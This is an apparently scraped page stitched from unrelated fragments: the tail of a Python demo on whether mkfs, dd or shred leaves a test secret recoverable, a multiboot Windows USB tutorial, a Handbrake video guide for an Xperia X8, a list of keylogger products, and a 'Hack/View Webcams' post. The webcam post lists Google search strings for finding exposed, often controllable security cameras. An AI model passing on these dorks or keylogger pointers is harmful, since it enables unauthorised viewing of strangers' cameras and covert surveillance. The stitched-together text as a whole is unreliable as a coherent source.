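    path = os.path.join(tempfile.mkdtemp(prefix="disk-"), "sda.img")
    with open(path, "wb") as fh:
        fh.write(b"SUPERBLOCK inode-table ".ljust(BLOCK, b"\0"))  # "metadata"
        fh.write(os.urandom(3 * BLOCK))                           # other files
        fh.write(b"notes.txt: " + secret)                         # the file
        fh.truncate(IMAGE_SIZE)                                   # rest is zero
    return path


def strings(path, min_len=4):
    """Printable runs of at least min_len bytes, like 'dd if=/dev/sda | strings'."""
    with open(path, "rb") as fh:
        data = fh.read()
    return [m.decode() for m in re.findall(rb"[ -~]{%d,}" % min_len, data)]


def mkfs_like(path):
    """Model of mkfs: rewrite only the metadata block; data blocks are untouched."""
    with open(path, "r+b") as fh:
        fh.write(b"NEW SUPERBLOCK".ljust(BLOCK, b"\0"))


def dd_zero(path):
    """Model of 'dd if=/dev/zero of=/dev/sda': a single pass of zeros over all of it."""
    size = os.path.getsize(path)
    with open(path, "r+b") as fh:
        fh.write(b"\0" * size)


def shred_like(path, passes=3):
    """Model of shred: `passes` random overwrites of every location, each flushed
    to storage, then a final zero pass."""
    size = os.path.getsize(path)
    with open(path, "r+b") as fh:
        for _ in range(passes):
            fh.seek(0)
            fh.write(os.urandom(size))
            fh.flush()
            os.fsync(fh.fileno())
        fh.seek(0)
        fh.write(b"\0" * size)


def secret_recoverable(path, secret):
    """Would a strings-style scan of the image still reveal `secret`?"""
    return any(secret.decode() in s for s in strings(path))


if __name__ == "__main__":
    img = make_disk_image(b"password=hunter2")     # constructed secret
    mkfs_like(img)
    print("after mkfs, recoverable:", secret_recoverable(img, b"password=hunter2"))
    shred_like(img)
    print("after shred, recoverable:", secret_recoverable(img, b"password=hunter2"))
```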
Create Multiboot USB Drive: Install Windows 7, XP From Same USB Drive
Earlier, we covered two tutorials: 1. How to install Windows XP from a USB drive; 2. How to install Windows 7 from a USB drive. Both processes work fine and the readers’ feedback was positive. But there were some drawbacks with those procedures:
1. The previous method of creating a bootable USB drive for Windows XP involves a number of steps and takes a lot of time to complete.
2. You have to use the same operating system to prepare the USB disk, i.e. if you want to prepare your USB drive to install Windows XP, you have to use Windows XP to apply the preparation method. The same applies when preparing the USB drive for Windows 7.
3. Those methods have no option to prepare the USB disk so that it can install both Windows XP and Windows 7 after a one-time effort.
But we found an awesome free utility, WinSetupFromUSB, which overcomes these drawbacks and allows you to create a multiboot USB drive to install Windows XP and Windows 7 from the same USB drive. No need to prepare your USB stick separately. The tool even works in both Windows XP and Windows 7.
Creating the Multiboot USB Drive for Windows 7 and XP
Creating the multiboot USB drive is easy and involves four simple steps. Before getting into the process, make sure that the USB drive you have is at least 4 GB (8 GB recommended) and formatted with the FAT32 file system. Once you are ready, download WinSetupFromUSB and extract it to any location on your computer. Then follow the steps below:
1. Insert the formatted USB drive in a USB port of your computer and run WinSetupFromUSB_1-0-beta7.exe.
2. Make sure that the utility has detected your USB drive.
3. Now enable the option Windows 2000/XP/2003 Setup by selecting the check box and browse to the location of the Windows XP installation files. Next, enable the option Vista/7/Server 2008 Setup/PE/RecoveryISO and browse to the location of the Windows 7 installation files. In both cases, if you have ISO images, extract them with WinRAR or 7-Zip.
4. Click the Go button to get started. It might take several minutes.
Though we have discussed the process only for Windows XP and Windows 7, you can also add Windows Vista as well as Linux.
Hack/View Webcams around the world [for free]
Copy/paste any ONE of these search strings into Google and it will produce live security/webcams. Most are controllable/zoomable etc. Just go to www.google.com and key in the below:
inurl:/view.shtml
inurl:ViewerFrame?Mode=
intitle:”Live View / - AXIS” | inurl:view/view.shtml^
inurl:ViewerFrame?Mode=Refresh
inurl:axis-cgi/jpg
inurl:axis-cgi/mjpg (motion-JPEG)
inurl:view/indexFrame.shtml
inurl:view/index.shtml
inurl:view/view.shtml
liveapplet
intitle:”live view” intitle:axis
intitle:liveapplet
allintitle:”Network Camera NetworkCamera”
intitle:axis intitle:”video server”
intitle:liveapplet inurl:LvAppl
intitle:”EvoCam” inurl:”webcam.html”
intitle:”Live NetSnap Cam-Server feed”
intitle:”Live View / - AXIS”
intitle:”Live View / - AXIS 206M”
intitle:”Live View / - AXIS 206W”
intitle:”Live View / - AXIS 210″
inurl:indexFrame.shtml Axis
inurl:”MultiCameraFrame?Mode=Motion”
intitle:start inurl:cgistart
intitle:”WJ-NT104 Main Page”
intext:”MOBOTIX M1″ intext:”Open Menu”
intext:”MOBOTIX M10″ intext:”Open Menu”
intext:”MOBOTIX D10″ intext:”Open Menu”
intitle:snc-z20 inurl:home/
intitle:snc-cs3 inurl:home/
intitle:snc-rz30 inurl:home/
intitle:”sony network camera snc-p1″
intitle:”sony network camera snc-m1″
site:.viewnetcam.com -www.viewnetcam.com
intitle:”Toshiba Network Camera” user login
intitle:”netcam live image”
intitle:”i-Catcher Console - Web Monitor”
keylogger collection
There are many keyloggers out there, but most of them are paid versions.
- stealth keylogger
- w investor keylogger
- remote keylogger
- soft central keylogger
- invisible keylogger
- home keylogger
- ghost keylogger
- golden keylogger
- ardamax keylogger
- actual spy keylogger
How to convert videos and get them on your Sony Ericsson Xperia X8
Thankfully this is very straight forward, with a little help from Know Your Mobile, and by following these steps you'll be able to convert videos and port them over to your Xperia X8 device.
You'll need the following things, though, before you get started:
- Installed copy of Handbrake software
- Video files and or DVD of your choice
- Sony Ericsson Xperia X8 with microUSB cable
- Launch Handbrake (figure 1)
- In the menu on the right-hand side, select the iPod Legacy preset (figure 1)
- Select your video source by clicking on the Source dropdown menu (we used a DVD for our testing purposes)
- Select the destination and name for the file once it has been converted (both the .mp4 and .m4v extension work for the Xperia X8)
- Confirm that the container is set to MP4 File and that Large file size, Web optimized, and iPod 5G support are unchecked
Picture Tab:
- Uncheck Keep Aspect Ratio
- Set the Xperia X8 Width and Height (the Xperia X8 supports a maximum of 480 x 320 pixels)
- Set Handbrake's encoding settings by clicking on the Video tab (figure 2)
- Confirm the Video Codec is set as H.264 (x264)
- Framerate (FPS) should be set to Same as source
- Under Quality, select the Avg Bitrate (kbps) and change it to 1500
- Set Handbrake's audio settings by clicking on the Audio tab (figure 3)
- Confirm the Audio Codec is AAC (faac)
- Mixdown should be set to Stereo
- Change the Samplerate to 48
- Change the Bitrate to 160
- Click on the Presets menu and select New Preset
- Enter Xperia X8 in the dialog box and click Add
- "Xperia X8" will now be saved as a preset and listed on the right hand side in Handbrake to be used in the future
- Click on the Start button in Handbrake
- A command line/DOS window will open and start to process the video conversion
- Once the conversion is done, mount your Xperia X8 on to your computer via USB
- Once mounted, create a folder named Video in the root folder on the Xperia X8
- Copy converted file into the Video folder
A few things to keep in mind when converting video:
- The Xperia X8 does not like video file sizes over 2 GB (the settings in Step II should help ensure that the file size is kept under 2 GB)
- Your converted video will only be as good as the source video
- If your source is over 480 x 320, you must be sure to set the width and height to a maximum of 480 x 320 as noted in Step II